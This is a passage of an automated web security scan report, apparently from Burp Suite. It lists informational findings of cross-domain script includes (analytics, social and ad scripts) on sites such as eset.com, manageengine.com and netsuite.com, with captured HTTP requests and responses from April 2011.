<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.50. http://www.eset.com/us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:14:28 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:14:28 GMT
X-Varnish: 555646579
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

23.51. http://www.eset.com/us/business/products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/products

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

23.52. http://www.eset.com/us/business/server-security/linux-file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/server-security/linux-file

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

23.53. http://www.eset.com/us/home/smart-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/home/smart-security

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

Response

23.54. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

23.55. http://www.eset.com/us/styles/store-new.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/styles/store-new.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 12:58:56 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26705
Date: Mon, 25 Apr 2011 12:58:56 GMT
X-Varnish: 1310977946
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

23.56. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js

Request

Response

23.57. http://www.iveco-ptc.spb.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iveco-ptc.spb.ru
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://mc.yandex.ru/metrika/watch.js

Request

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...

<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript"></script>
...[SNIP]...

23.58. http://www.iveco-ptc.spb.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iveco-ptc.spb.ru
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://mc.yandex.ru/metrika/watch.js

Request

GET /favicon.ico HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00fce441a740fea86b906e1e933c9d1b

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:51:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10399

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...

<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript"></script>
...[SNIP]...

23.59. http://www.kronos.com/about/about-kronos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kronos.com
Path:	/about/about-kronos.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /about/about-kronos.aspx HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=6; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; mbox=session#1303738433760-48782#1303741368|check#true#1303739568

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:51:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 50460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=kronosinc"></script>
...[SNIP]...

23.60. http://www.livejournal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.media6degrees.com/static/lj6387.js
http://goods.adnectar.com/analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16

Request

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws24
ETag: "2973888db3f7f93cbba310f7bf86432d"
Vary: Accept-Encoding
Content-Language: en
X-Debug: USen gzip (null)
X-VWS-Id: bil1-varn03
X-Varnish: 307153447 307107722
Age: 292
Via: 1.1 varnish
Content-Length: 50232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
</div>
<script type="text/javascript" src="http://goods.adnectar.com/analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16"></script>
...[SNIP]...
<div id='hello-world' style='text-align: left; font-size:0; line-height:0; height:0; overflow:hidden;'><script src="http://cdn.media6degrees.com/static/lj6387.js" type="text/javascript"></script>
...[SNIP]...

23.61. http://www.manageengine.com/me_partners.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/me_partners.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://gmaps-utility-library.googlecode.com/svn/trunk/markerclusterer/1.0/src/markerclusterer.js
http://maps.google.com/maps?file=api&v=2.x&key=ABQIAAAAG6seZC5-80EYpG3Eowtf_xRwM1sgXERs8XczokQgZjklQhF0XhQSa2xDB0fQgxu1i4QAlNSpXoJ36w
http://www.google-analytics.com/ga.js

Request

GET /me_partners.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 05:36:02 GMT
ETag: "320aa-4a153000c3480"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 204970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.62. http://www.manageengine.com/products/applications_manager/application-performance-management.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/products/applications_manager/application-performance-management.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET /products/applications_manager/application-performance-management.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.9.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:38 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:22:06 GMT
ETag: "8fc7-49f3702cf4b80"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 36807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.63. http://www.manageengine.com/products/security-manager/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/products/security-manager/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

23.64. http://www.manageengine.com/products/security-manager/download.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/products/security-manager/download.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://flex.atdmt.com/mstag/site/b060e217-431e-47e2-b8f7-c11fe85e301e/mstag.js
http://www.google-analytics.com/ga.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

23.65. http://www.manageengine.com/products/security-manager/store.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/products/security-manager/store.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/ga.js
https://iplocation.zoho.com/
https://mestore.store.zoho.com/storeapi.na

Request

GET /products/security-manager/store.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "b67e-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 46718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<script src="https://mestore.store.zoho.com/storeapi.na" type="text/JavaScript"></script>
...[SNIP]...
</script>
<script language="javascript" src="https://iplocation.zoho.com"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.66. https://www.manageengine.com/network-performance-management.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/network-performance-management.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://t5.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/ga.js

Request

GET /network-performance-management.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/service-desk/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:27:38 GMT
ETag: "b11e-49f3716993680"
Accept-Ranges: bytes
Cache-Control: max-age=-2170060
Expires: Thu, 31 Mar 2011 09:27:38 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 45342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.67. https://www.manageengine.com/products/security-manager/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/products/security-manager/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET /products/security-manager/index.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:51 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=-2247722
Expires: Wed, 30 Mar 2011 11:51:49 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.68. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The response dynamically includes the following scripts from other domains:

http://foreign.dt00.net/zones/form4.js
http://foreign.dt00.net/zones/zone19.php?country=4&region=0
http://foreign.dt00.net/zones/zone23.php?country=4&region=0
http://storage.trafic.ro/js/trafic.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</ul>
<script type="text/javascript" src="http://foreign.dt00.net/zones/form4.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://foreign.dt00.net/zones/zone23.php?country=4&region=0"></script>
...[SNIP]...

<script type="text/javascript" src="http://foreign.dt00.net/zones/zone19.php?country=4&region=0"></script>
...[SNIP]...
</noscript>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://storage.trafic.ro/js/trafic.js"
></script>
...[SNIP]...

23.69. http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/products/ecommerce/website-hosting.shtml

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /portal/products/ecommerce/website-hosting.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename="website-hosting.shtml"
NS_RTIMER_COMPOSITE: 677094517:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 15:19:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 37989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...

23.70. http://www.outpost24.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outpost24.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.woopra.com/js/woopra.js
http://www.google-analytics.com/urchin.js

Request

Response

23.71. http://www.outpost24.com/products.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outpost24.com
Path:	/products.html

Issue detail

The response dynamically includes the following scripts from other domains:

